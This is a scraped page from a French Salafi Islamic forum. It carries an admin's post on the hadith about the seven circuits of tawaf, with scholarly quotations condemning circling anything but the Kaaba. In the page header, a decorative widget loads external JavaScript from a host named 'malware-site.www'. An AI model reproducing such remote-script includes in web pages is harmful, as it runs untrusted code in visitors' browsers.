ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    celui qui fait 7 tours de tawefs

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    celui qui fait 7 tours de tawefs

    Message par assalafia le Mar 26 Aoû - 9:11

    Surprised




    Surprised

    Celui qui fait sept tours de tawaf et prie deux unités de prière
     
    Au nom d'Allah, le Tout Miséricordieux, le Très Miséricordieux.

    D'après Ibn Omar (qu'Allah les agrée), le Prophète (que la prière d'Allah et son salut soient sur lui) a dit: « Celui qui fait sept tours de tawaf en les comptant (*) et prie deux unités de prière est comme celui qui a affranchi un esclave ».
    (Rapporté par Ahmed et authentifié par cheikh Albani dans Sahih Targhib n°1139)

    (*) Cheikh Albani a dit: « Il y a dans ceci une allusion au fait que les actes méritoires qui sont conditionnés par un nombre précis, il faut forcément s'accrocher à ce nombre précis sans rien y rajouter ni y enlever ».
    (Sahih Targhib vol 2 p 26)

    [size=32]
    عن بن عمر رضي الله عنهما قال رسول الله صلى الله عليه وسلم : و من طاف أسبوعا يحصيه وصلى ركعتين كان كعدل رقبة
    (رواه أحمد و صححه الشيخ الألباني في صحيح الترغيب و الترهيب رقم ١١٣٩)
    [/size]


    Remarque importante :

    Le tawaf est une adoration qui ne peut être pratiquée que pour Allah et qu'autour de la ka'ba.
    Le fait de tourner autour d'autre chose que la ka'ba est une habitude de la période anté-islamique.

    D'après Mahdi Ibn Maymoun, j'ai entendu Abou Raja Al Outayridi dire en décrivant les adorations qu'ils pratiquaient dans la période anté-islamique: « Nous adorions les pierres, quand nous trouvions une pierre meilleure que celle que nous adorions nous délaissions l'ancienne pour adorer la nouvelle. Il arrivait que l'on ne trouve pas de pierre alors dans ce cas nous apportions un tas de terre. Puis nous faisions venir une brebis et nous la trayions dessus puis nous tournions autour du tas de terre ».
    (Rapporté par Boukhari dans son Sahih n°4376)

    [size=32]
    عن مهدي بن ميمون: سمعت أبا رجاء العطاردي يقول : كنا نعبد الحجر فإذا وجدنا حجرا هو خير منه ألقيناه وأخذنا الآخر . فإذا لم نجد حجرا جمعنا جثوة من تراب ثم جئنا بالشاة فحلبناه عليه ثم طفنا به
    (رواه البخاري في صحيحه رقم ٤٣٧٦)
    [/size]


    Le fait de faire le tawaf autour d'autre chose que la ka'ba, quelle que soit cette chose (une personne pieuse, une tombe, un arbre...) se divise en deux catégories:

    - Si la personne fait ceci pour se rapprocher d'Allah alors cet acte est une innovation interdite.

    Cheikh Al Islam Ibn Taymiya a dit: « Le tawaf autour de la ka'ba fait partie de ce qu'Allah et son Messager (que la prière d'Allah et son salut soient sur lui) ont ordonné. Par contre le tawaf autour des prophètes et des hommes pieux est interdit par consensus des musulmans, peu importe que l'on tourne autour de la personne ou autour de sa tombe ».
    (Majmou Al Fatawa 2/308)

    - Si la personne fait ceci pour se rapprocher d'un autre qu'Allah alors ceci est de la grande association (shirk akbar) car il n'y a que Allah qui mérite d'être adoré et le fait de faire une adoration pour un autre que lui est de la grande association.


    L'imam Mohamed Ibn Ibrahim Al Cheikh (mort en 1398) a dit: « En ce qui concerne le tawaf autour d'une tombe et demander la bénédiction de cette tombe, aucune personne dotée de raison ne doute de l'interdiction de cela et qu'il s'agit d'association car certes le tawaf est une adoration et donc le pratiquer pour un autre qu'Allah est de l'association ».
    (Majmou Al Fatawa Wa Rasail vol 1 p 122)
     
     



     

      La date/heure actuelle est Lun 20 Nov - 5:05